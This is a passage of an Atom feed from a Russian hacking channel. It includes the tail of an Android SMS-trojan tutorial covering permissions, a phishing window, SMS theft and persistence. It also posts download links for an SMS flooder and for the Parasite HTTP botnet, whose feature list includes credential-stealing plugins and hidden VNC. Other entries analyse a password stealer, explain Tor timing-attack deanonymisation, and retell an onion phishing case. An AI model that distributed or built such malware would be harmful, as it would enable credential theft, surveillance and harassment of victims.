&amp;lt;uses-permission android:name=&amp;quot;android.permission.RECEIVE_SMS&amp;quot; /&amp;gt; // возможность получать смс нашему приложению
&amp;lt;uses-permission android:name=&amp;quot;android.permission.INTERNET&amp;quot; /&amp;gt; // доступ к интернету нашему приложению
&lt;/pre&gt;
  &lt;p&gt;Вот так это должно выглядеть после того, как вы все сделаете.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Пример&lt;/strong&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://codeby.net/attachments/snimok-ehkrana-2018-12-24-v-2-00-40-png.24371/&quot; width=&quot;1600&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Но, если вы и выставили эти разрешения, они не будут активированы. Вам нужно чтобы пользователь их подтвердил, окошечко подтверждения не будет вылазить если вы все выставите в xml файле, вам нужно прописать вызов этих окон ручками. А андроид манифест это проводник вашего приложения, глаза и уши вашего трояна, так сказать.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Планировка приложения​&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Все будет действовать по одной схеме и все будет начинаться с класса MainActivity. Именно он будет задействован когда пользователь откроет наш подарочек. Именно из этого класса мы будем вызывать другие классы, он будет отправной точкой нашего приложения.&lt;/p&gt;
  &lt;p&gt;Пользователь открыл приложение ----&amp;gt; вызов MainActivity -----&amp;gt; вызов других классов.&lt;/p&gt;
  &lt;p&gt;В MainActivity я впихал все необходимое, маскировка и показывание фишинг окна для того, чтобы юзер дал нам разрешения для СМС.&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Заключение&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Вот и закончилась 1 часть моей серии. Здесь мы обсудили именно основы и приступили к планировки нашего приложения. Отправной путь пройден, осталось только кодить и кодить! В следующей части мы научимся маскировать, показывать фальшивое окно для фишинга, воровать смски и закрепляться в системе. Если поддержите - то хорошо, будет целый цикл. Остановился пока только на этом, всем удачи.&lt;/p&gt;
  &lt;h3&gt;Наши услуги: @&lt;a href=&quot;https://t.me/GOdayBot&quot; target=&quot;_blank&quot;&gt;GOdayBot&lt;/a&gt;&lt;/h3&gt;
  &lt;blockquote&gt;&lt;em&gt;Внимание!!! Вся Информация на канале &amp;quot;0-day | Уязвимость 0-го дня&amp;quot; для ознакомления, не несёт в себе призыва к чему-либо, автор не несёт никакой ответственности. 18&lt;/em&gt;&lt;/blockquote&gt;

</content></entry><entry><id>0-day:SJV67DGWV</id><link rel="alternate" type="text/html" href="https://teletype.in/@0-day/SJV67DGWV?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=0-day"></link><title>Тайминг-атака.</title><published>2018-12-27T14:37:48.479Z</published><updated>2018-12-27T14:37:48.479Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/93/93f18e20-fc7c-48a3-a6da-0cb1a4a540c0.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/34/3421c64d-32da-4319-a323-6d0eed26e9a7.jpeg&quot;&gt;Представьте себе ситуацию: вы сотрудник спецслужбы, и ваша задача – вычислить особо опасного преступника, занимающегося шантажом и появляющегося в сети периодически и только для передачи данных. </summary><content type="html">
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/34/3421c64d-32da-4319-a323-6d0eed26e9a7.jpeg&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;&lt;strong&gt;Представьте себе ситуацию: вы сотрудник спецслужбы, и ваша задача – вычислить особо опасного преступника, занимающегося шантажом и появляющегося в сети периодически и только для передачи данных. &lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Для преступной деятельности он завел отдельный ноутбук, из которого «вырезал» микрофон, колонки и камеру. Разумное решение, учитывая, что колонки тоже умеют слушать.&lt;/p&gt;
  &lt;p&gt;В качестве операционной системы он использует Tails, хотя для максимальной анонимности стоило бы взять Whonix. Так или иначе, весь трафик идет через Tor, он не доверяет VPN, да и для работы в Даркнете Tor ему все равно необходим.&lt;/p&gt;
  &lt;p&gt;Для общения он использует Jabber с PGP-шифрованием, он мог бы поставить и Телеграм, но это представитель старой школы преступников. Даже если у вас будет доступ к серверу Jabber, вы сможете получить лишь зашифрованные данные и IP-адреса Тор. Это бесполезная информация.&lt;/p&gt;
  &lt;p&gt;Преступник работает по принципу «молчание-золото», лишнего не скажет, ссылки или файла не откроет.&lt;/p&gt;
  &lt;p&gt;Известно лишь, что он должен находиться в одной стране с вами. Казалось бы, шансов установить его личность нет, но это иллюзия, установить его личность можно несмотря на все принимаемые им меры. Описанный случай идеален для применения тайминг-атаки по мессенджеру.&lt;/p&gt;
  &lt;p&gt;Первым делом необходима программа, которая будет отслеживать и записывать все входы и выходы пользователя. Он появился в сети – система сразу отмечает у себя время, ушел – система записала время выхода.&lt;/p&gt;
  &lt;p&gt;Лог выглядит примерно так:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/6c/6c9a5cd4-7392-4b27-bd00-87ddcb33ace3.png&quot; width=&quot;1352&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Теперь на руках у вас есть лог его активности за несколько дней, пришло время воспользоваться системой ОРМ (оперативно-розыскных мероприятий).&lt;/p&gt;
  &lt;p&gt;Подобные системы есть в распоряжении спецслужб большинства стран, в России это СОРМ. Нужно выяснить, кто в эти временные промежутки +/- 5 минут в вашей стране подключался к сети Tor.  Мы знаем, что цель, которую необходимо деанонимизировать, подключилась 22.04.2018 в 11:07 и отключилась в 12:30.&lt;/p&gt;
  &lt;p&gt;В эти же временные точки (+/- 5 минут) на территории страны подключились к сети Tor и отключились от нее 3000 человек. Мы берем эти 3000 и смотрим, кто из них снова подключился в 14:17 и отключился в 16:54, как думаете, сколько человек останется?&lt;/p&gt;
  &lt;p&gt;Так, шаг за шагом, круг сужается, и в итоге вам удастся вычислить место выхода в сеть преступника. Чем чаще он заходит в сеть и чем меньше в это время других пользователей, тем быстрее сработает тайминг-атака.&lt;/p&gt;
  &lt;h2&gt;Что может помешать проведению тайминг-атаки&lt;/h2&gt;
  &lt;p&gt;Постоянная смена точек выхода в сеть делает подобную атаку бессмысленной. Если же цель периодически меняет точки выхода, это может затруднить поиск, но является заранее допустимым вариантом и не способно запутать систему.&lt;/p&gt;
  &lt;p&gt;Мы надеемся, что наши читатели не относятся к разыскиваемым преступникам и им не придется кочевать из одного кафе с публичным Wi-Fi в другое. Однако вторым советом против тайминг-атаки стоит воспользоваться каждому. Речь идет об отключении на уровне мессенджера передачи информации о статусе либо установлении постоянного статуса «офлайн». Большинство мессенджеров предоставляют одну из подобных возможностей.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Вот так это выглядит в Телеграм: &lt;/strong&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/b5/b5d36279-4b21-45ef-acbc-790faa9e8fa9.png&quot; width=&quot;727&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote&gt;&lt;strong&gt;СОВЕТ:&lt;/strong&gt; Если в вашем мессенджере возможно скрыть данные о вашем статусе, скройте эту информацию.&lt;/blockquote&gt;
  &lt;p&gt;Дополнительным инструментом защиты от тайминг-атаки может стать прекращение включения мессенджера вместе с подключением к сети. Как вы можете понять из описания атаки, сверяется время входа/выхода в сеть и появление на связи/уход в офлайн в мессенджере. Допускается погрешность, но она не должна быть очень большой.&lt;/p&gt;

</content></entry><entry><id>0-day:Bkrk0kZ-4</id><link rel="alternate" type="text/html" href="https://teletype.in/@0-day/Bkrk0kZ-4?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=0-day"></link><title>Bitmassage</title><published>2018-12-26T12:02:37.455Z</published><updated>2018-12-26T12:02:37.455Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/b0/b0418aeb-62b4-45ff-bfce-1f853056c4a8.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/1b/1bfb3a82-65f0-4363-a096-fe72e22402ee.jpeg&quot;&gt;Bitmessage – бесплатный мессенджер с открытым исходным кодом, зарекомендовавший себя как надежный инструмент для ведения анонимных и защищенных переписок в сети.</summary><content type="html">
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/1b/1bfb3a82-65f0-4363-a096-fe72e22402ee.jpeg&quot; width=&quot;2501&quot; /&gt;
  &lt;/figure&gt;
  &lt;h2&gt;Bitmessage. Самый анонимный мессенджер.&lt;/h2&gt;
  &lt;p&gt;Bitmessage – бесплатный мессенджер с открытым исходным кодом, зарекомендовавший себя как надежный инструмент для ведения анонимных и защищенных переписок в сети.&lt;/p&gt;
  &lt;blockquote&gt;&lt;strong&gt;Миф&lt;/strong&gt; Любое адресное сообщение должно иметь адресата и отправителя.&lt;/blockquote&gt;
  &lt;blockquote&gt;&lt;strong&gt;Реальность&lt;/strong&gt; Bitmessage позволяет отправлять сообщения без адресата и отправителя. При этом его прочтет только получатель, которому вы его отправляете.&lt;/blockquote&gt;
  &lt;h2&gt;Почему Bitmessage&lt;/h2&gt;
  &lt;p&gt;Архитектура Bitmessage устроена следующим образом: сообщение рассылается абсолютно ВСЕМ компьютерам сети, но расшифровать его может только адресат, которому оно предназначается.&lt;/p&gt;
  &lt;p&gt;Это делает абсолютно невозможным контроль переписки пользователей по причине отсутствия информации о получателе (и отправителе). Вспомните историю о шифре Цезаря, когда он слал своим генералам зашифрованные сообщения. Хотя варвары и не могли прочесть зашифрованный текст, они могли отследить, с кем ведется переписка, и перехватить сообщение адресату. А представьте ситуацию, когда одно сообщение Цезарь шлет сразу всем своим генералам и даже варварам, все получают это зашифрованное послание, но прочесть его может только владелец секрета вскрытия шифра. В этом случае адресат переписки неизвестен и никак не может быть установлен, а как вы узнаете, у кого есть этот секрет?&lt;/p&gt;
  &lt;p&gt;Bitmessage использует шифрование открытым ключом, потому даже отправитель не может расшифровать отправленные сообщения, это может только адресат. Зашифрованные сообщения хранятся в сети четыре дня (при настройках по умолчанию).&lt;/p&gt;
  &lt;p&gt;Bitmessage – единственный анонимный мессенджер. Других анонимных мессенджеров мне не известно. Многие считают анонимным XMPP/Jabber, однако это не совсем так. XMPP/Jabber не анонимен: есть адресат, у этого адресата есть IP-адрес, который сохраняется в логах сервера, есть данные, когда адресат был в сети, откуда ему приходили сообщения, можно предположить, как долго велась переписка. У Bitmessage нет ни адресата, ни сервера, ни логов.&lt;/p&gt;
  &lt;p&gt;Установка Bitmessage&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://bitmessage.org/wiki/Main_Page&quot; target=&quot;_blank&quot;&gt;Скачать программу можно на официальном сайте&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>0-day:HJ2VAERxE</id><link rel="alternate" type="text/html" href="https://teletype.in/@0-day/HJ2VAERxE?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=0-day"></link><title>SMS Flooder</title><published>2018-12-24T11:08:36.180Z</published><updated>2018-12-24T11:08:36.180Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/b0/b0418aeb-62b4-45ff-bfce-1f853056c4a8.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/1b/1bfb3a82-65f0-4363-a096-fe72e22402ee.jpeg&quot;&gt;Формат номера код страны без + и вуаля шалость удалась)</summary><content type="html">
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/1b/1bfb3a82-65f0-4363-a096-fe72e22402ee.jpeg&quot; width=&quot;2501&quot; /&gt;
  &lt;/figure&gt;
  &lt;h2&gt;&lt;a href=&quot;https://www.virustotal.com/ru/file/ee6a81b9219588dc917fac4307919dcb26d6b9f6a5f847aed9f9053a8fbae101/analysis/1538683959/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;VirusTotal&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/f2/f2dc3172-7103-486b-aac9-81b0974421b2.jpeg&quot; width=&quot;313&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Формат номера код страны без + и вуаля шалость удалась)&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Скачать:&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;&lt;a href=&quot;https://yadi.sk/d/pQRtZXkkqLJ1hw&quot; target=&quot;_blank&quot;&gt;https://yadi.sk/d/pQRtZXkkqLJ1hw&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>0-day:BJrDurcxV</id><link rel="alternate" type="text/html" href="https://teletype.in/@0-day/BJrDurcxV?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=0-day"></link><title>​​Parasite HTTP Botnet + Bin</title><published>2018-12-21T11:02:53.291Z</published><updated>2018-12-21T11:02:53.291Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/b0/b0418aeb-62b4-45ff-bfce-1f853056c4a8.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/1b/1bfb3a82-65f0-4363-a096-fe72e22402ee.jpeg&quot;&gt;Сам не тестил, запускайте на виртуалке или дедике</summary><content type="html">
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/1b/1bfb3a82-65f0-4363-a096-fe72e22402ee.jpeg&quot; width=&quot;2501&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote&gt;Сам не тестил, запускайте на виртуалке или дедике&lt;/blockquote&gt;
  &lt;h2&gt;&lt;strong&gt;Скачать: &lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;&lt;a href=&quot;https://mega.nz/#!iv43AIZT!1beYNQI_UuQFAH3Bc4r6lq2qKT2yHt3tqwvWQo2O54A&quot; target=&quot;_blank&quot;&gt;https://mega.nz/#!iv43AIZT!1beYNQI_UuQFAH3Bc4r6lq2qKT2yHt3tqwvWQo2O54A&lt;/a&gt;&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Parasite HTTP Remote Administration Tool&lt;/strong&gt;&lt;/h2&gt;
  &lt;h2&gt;&lt;strong&gt;Что такое паразит HTTP?&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Parasite HTTP - это профессионально закодированный модульный инструмент удаленного администрирования для окон, написанных на C, который не имеет зависимостей, кроме самой ОС.&lt;/p&gt;
  &lt;p&gt;С размером заглушки ~ 49kb и поддержкой плагинов это идеальное решение для управления большим количеством компьютеров из удаленного места.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/d5a7308e2f565a5899fa5.png&quot; width=&quot;320&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/a2978f12b1b42617e3cd1.png&quot; width=&quot;320&quot; /&gt;
  &lt;/figure&gt;
  &lt;h2&gt;&lt;strong&gt;Характеристики&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Нет зависимостей (закодировано в C)&lt;/p&gt;
  &lt;p&gt;Небольшой размер заглушки (~ 49 КБ без сжатия, ~ 23 КБ)&lt;/p&gt;
  &lt;p&gt;Динамические вызовы API (без IAT)&lt;/p&gt;
  &lt;p&gt;Зашифрованные строки&lt;/p&gt;
  &lt;p&gt;Обойти Ring3 крючки&lt;/p&gt;
  &lt;p&gt;Безопасная панель C &amp;amp; C написана на PHP&lt;/p&gt;
  &lt;p&gt;Обход брандмауэра&lt;/p&gt;
  &lt;p&gt;Поддерживает как x86, так и x64 ОС Windows (от XP до 10)&lt;/p&gt;
  &lt;p&gt;Полная поддержка юникода&lt;/p&gt;
  &lt;p&gt;Онлайн-конструктор, привязанный к вашему домену / s (сборка бота в любое время с любыми настройками)&lt;/p&gt;
  &lt;p&gt;Зашифрованная связь с панелью C &amp;amp; C (необязательно - SSL с использованием самозаверяющего сертификата)&lt;/p&gt;
  &lt;p&gt;Система плагинов&lt;/p&gt;
  &lt;p&gt;Несколько резервных доменов&lt;/p&gt;
  &lt;p&gt;Постоянство всей системы (только процессы x86) (Необязательно)&lt;/p&gt;
  &lt;p&gt;Инъекция в системный процесс из белого списка (необязательно)&lt;/p&gt;
  &lt;p&gt;Установить и расплавить (опционально)&lt;/p&gt;
  &lt;p&gt;Скрытый запуск (необязательно)&lt;/p&gt;
  &lt;p&gt;Анти-Эмуляция (опционально)&lt;/p&gt;
  &lt;p&gt;Anti-Debug&lt;/p&gt;
  &lt;p&gt;Расширенная статистика и информация в панели&lt;/p&gt;
  &lt;p&gt;Усовершенствованная система управления задачами&lt;/p&gt;
  &lt;p&gt;Задача при подключении (новые клиенты будут выполнять задачу (и))&lt;/p&gt;
  &lt;p&gt;Низкое использование ресурсов&lt;/p&gt;
  &lt;p&gt;Специальный код безопасности страницы входа&lt;/p&gt;
  &lt;p&gt;Капча на странице входа для предотвращения атак методом перебора&lt;/p&gt;
  &lt;p&gt;Загрузка и выполнение (поддерживает ссылки HTTP и HTTPS)&lt;/p&gt;
  &lt;p&gt;Обновить&lt;/p&gt;
  &lt;p&gt;Удалить&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Доступные плагины&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;Управление пользователями&lt;/p&gt;
  &lt;p&gt;Восстановление пароля браузера&lt;/p&gt;
  &lt;p&gt;Восстановление пароля FTP&lt;/p&gt;
  &lt;p&gt;Восстановление пароля IM&lt;/p&gt;
  &lt;p&gt;Восстановление пароля электронной почты&lt;/p&gt;
  &lt;p&gt;Восстановление лицензионных ключей Windows&lt;/p&gt;
  &lt;p&gt;Скрытый VNC&lt;/p&gt;
  &lt;p&gt;Обратный прокси Socks5&lt;/p&gt;
  &lt;h2&gt;&lt;strong&gt;Системный запрос&lt;/strong&gt;&lt;/h2&gt;
  &lt;p&gt;PHP 5.6 или выше (Gd &amp;amp; OpenSSL)&lt;/p&gt;
  &lt;p&gt;IonCube Loader&lt;/p&gt;
  &lt;p&gt;База данных SQL&lt;/p&gt;

</content></entry><entry><id>0-day:Hk8mCnPeN</id><link rel="alternate" type="text/html" href="https://teletype.in/@0-day/Hk8mCnPeN?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=0-day"></link><title>Анализ стиллера Immortal</title><published>2018-12-19T12:48:30.269Z</published><updated>2018-12-19T12:48:30.269Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/0b/0b51d7c6-b08a-4708-abf3-120bea49f32a.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/9d/9d586df2-117c-4aea-a194-5d19186f527f.jpeg&quot;&gt;Писал не я, так что статья четко спизжена 😂</summary><content type="html">
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/9d/9d586df2-117c-4aea-a194-5d19186f527f.jpeg&quot; width=&quot;2501&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote&gt;Писал не я, так что статья четко спизжена 😂&lt;/blockquote&gt;
  &lt;h3&gt;&lt;strong&gt;Введение&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;NoFile - это стиллер, написанный на языке C# кодером 1ms0rry, ему уже не один год, но даже в 2018 можно найти яркий пример использования его исходников. Таковым &amp;quot;ремейком&amp;quot; является стиллер от Zet5D под названием Immortal 2.7.5.&lt;/p&gt;
  &lt;p&gt;Тема продажник: &lt;a href=&quot;https://lolzteam.net/threads/626111/&quot; target=&quot;_blank&quot;&gt;https://lolzteam.net/threads/626111/&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Последние обновление этого стиллера было 27 октября:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/7ab60a6808406e4adf215.png&quot; width=&quot;785&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Мне повезло достать семпл последней версии:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/a664fdc61c0426bbbb58c.png&quot; width=&quot;450&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;&lt;strong&gt;Анализ&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Прежде всего, сканируем файлик через DiE 2.0:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/1fe0ddd19856be0afc8cc.png&quot; width=&quot;494&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Удивительно, что в графе compiler мы видим C\C++, однако в графе protector написано, что использовался .NET Reactor(4.5-4.7). Тому виной специальная функция протектора NET Reactor. Так же подвох заключается в том что, использовался NET Reactor 5.0.0.0, а DiE показывает другую версию.&lt;/p&gt;
  &lt;p&gt;Деобфускация (de4dot в помощь) много времени не занимает...&lt;/p&gt;
  &lt;p&gt;Полученный .NET (4.0!!!) файл декомпилировать можно через dnSpy:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/f08f0de4215f584817e66.png&quot; width=&quot;351&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;&lt;strong&gt;Исходный код&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Для удобства чтения я переназвал все методы и поля. Идти стоит по порядку, открываем точку входа:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/0e8b1ed5b81d9a464e3fb.png&quot; width=&quot;503&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Тут все просто:&lt;/p&gt;
  &lt;p&gt;Переменные windows_username, version - тут все понятно. А в переменную hwid записывается значение guid машины:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/b6e1f4f723c1c70ffff5a.png&quot; width=&quot;920&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Далее вызывается единственный метод, в нем же и находятся все основные функции этого стиллера:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/ac2450afe9a807f52a737.png&quot; width=&quot;946&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/01fe6b9a4ee12affd7fba.png&quot; width=&quot;567&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Я немного удивился: &amp;quot;В релиз версии, дебаг код?&amp;quot; - да. Но что более странно - так это то, что каждый этот метод обернут в try\catch еще и внутри.&lt;/p&gt;
  &lt;p&gt;В начале статьи, я вспомнил про такой стиллер NoFile и сделал это не с проста, дело в том, что 80% написанного кода является списанным с того самого проекта от 1msorry.&lt;/p&gt;
  &lt;p&gt;На моей памяти NoFile - это первый стиллер, который использует вместо Sqlite &lt;a href=&quot;https://github.com/1M50RRY/NoFile-stealer/blob/master/Tools/SqlHandler.cs&quot; target=&quot;_blank&quot;&gt;собственное решение&lt;/a&gt;, даже не смотря на то, что код этого модуля, написанный 1msorry, родом из другой малвари. Думаю, об этом не сложно догадаться, просто взглянув на названия переменных и функций, читать это сложновато, и сам факт работы этого модуля удивляет. Основывается он на хитром обходе sqlite базы данных, для примера:&lt;/p&gt;
  &lt;p&gt;Это строка (34) из того самого стиллера -&lt;/p&gt;
  &lt;blockquote&gt;this.ReadMasterTable(100L);&lt;/blockquote&gt;
  &lt;p&gt;Статья на &lt;a href=&quot;https://habr.com/post/223449/&quot; target=&quot;_blank&quot;&gt;habr &lt;/a&gt;-&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/8bb97e9b5fbac3999c9f9.png&quot; width=&quot;757&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Теперь вернемся к исходникам Immortal:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/abd0e9ae603ca70599bf9.png&quot; width=&quot;589&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;И обратимся к тому самому SqlHandler:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/19de8dc130c19fb0236d7.png&quot; width=&quot;400&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Если продолжать смотреть код, то там сходство 100%. Да и более того, я хорошо изучил SqlHandler и могу смело сказать, что там как минимум 3 серьезных бага, которые могут сильно нарушить работоспособность программы.&lt;/p&gt;
  &lt;p&gt;Вот мы и подошли к методу получения паролей:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/22e1dc909e530a9a83da9.png&quot; width=&quot;674&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Учитывая, то, что все пути до дефолтных учеток хранятся в полу константном массиве:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/d395bebd39458a468b66e.png&quot; width=&quot;899&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;А теперь последнее, охуеть какое совпадение, снова откроем GitHub 1ms0rry:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/01f9b21a02b8ade633e47.png&quot; width=&quot;684&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;А теперь в dnSpy:&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/b5373e2aed59af5fb22ef.png&quot; width=&quot;664&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;&lt;strong&gt;Итог&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Думаю понятно, что стиллер полностью является ремейком старого стиллера, который сейчас можно редко где встретить.&lt;/p&gt;
  &lt;p&gt;Исходный код проекта: &lt;a href=&quot;https://github.com/Alexuiop1337/Immortal2.0-by-Zet5D&quot; target=&quot;_blank&quot;&gt;https://github.com/Alexuiop1337/Immortal2.0-by-Zet5D&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>0-day:Bk0cYXIlN</id><link rel="alternate" type="text/html" href="https://teletype.in/@0-day/Bk0cYXIlN?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=0-day"></link><title>Фишинг в .onion</title><published>2018-12-18T08:02:30.419Z</published><updated>2018-12-18T08:02:30.419Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/93/93f18e20-fc7c-48a3-a6da-0cb1a4a540c0.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/34/3421c64d-32da-4319-a323-6d0eed26e9a7.jpeg&quot;&gt;Фишинг в клирнете сейчас обычное дело. Его легко обнаружить и также легко предотвратить.</summary><content type="html">
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/34/3421c64d-32da-4319-a323-6d0eed26e9a7.jpeg&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Фишинг в клирнете сейчас обычное дело. Его легко обнаружить и также легко предотвратить.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Но что делать при угрозе фишинга в Даркнете?&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Один из владельцев сайта в зоне .onion опубликовал у себя в блоге &lt;a href=&quot;https://incoherency.co.uk/blog/stories/hidden-service-phishing.html&quot; target=&quot;_blank&quot;&gt;историю&lt;/a&gt; о том, как его сайт пытались использовать фишеры, и как он этому сопротивлялся.&lt;/p&gt;
  &lt;p&gt;&lt;em&gt;&amp;lt;Далее текст идет от первого лица&amp;gt;&lt;/em&gt;&lt;/p&gt;
  &lt;p&gt;Джеймс Стэнли создатель и владелец сервиса&lt;em&gt;SMS Privacy&lt;/em&gt;. Этот сервис предназначен для анонимного приема sms-сообщений за биткоины. У этого сервиса существует зеркало в сети Tor.&lt;/p&gt;
  &lt;p&gt;Однажды эксперт по безопасности &lt;a href=&quot;https://charlie.ht/&quot; target=&quot;_blank&quot;&gt;Чарли Хотерсолл-Томас&lt;/a&gt; обнаружил, что поиск Google для «site:*.onion.to smsprivacy» выдает неожиданный результат.&lt;/p&gt;
  &lt;p&gt;smspriv6fynj23u6.onion — это законное имя скрытого сервиса, но есть и другой результат, который выглядит одинаково: smsprivyevs6xn6z.onion&lt;/p&gt;
  &lt;p&gt;Краткое исследование показало, что сайт был простым прокси: запросы на страницы, отправленные на фишинговый сайт, были отправлены на настоящий скрытый сервис, а ответы перенаправлены назад, за исключением нескольких идиосинкразий:&lt;/p&gt;
  &lt;p&gt;Заголовок Content-Length отсутствует&lt;/p&gt;
  &lt;p&gt;Заголовок Content-Length говорит клиенту HTTP, сколько байтов контента ожидать. Глупый прокси-сервер, который намерен передать содержимое без изменений, может просто передать заголовок Content-Length без изменений: он знает, что длина не изменится, если содержимое не может измениться.&lt;/p&gt;
  &lt;p&gt;То, что прокси-сервер считает, что длина содержимого может измениться, подразумевает, что сервер готов модифицировать контент в некоторых обстоятельствах.&lt;/p&gt;
  &lt;p&gt;Но почему он просто не пишет Content-Length, соответствующий модифицированной версии контента?&lt;/p&gt;
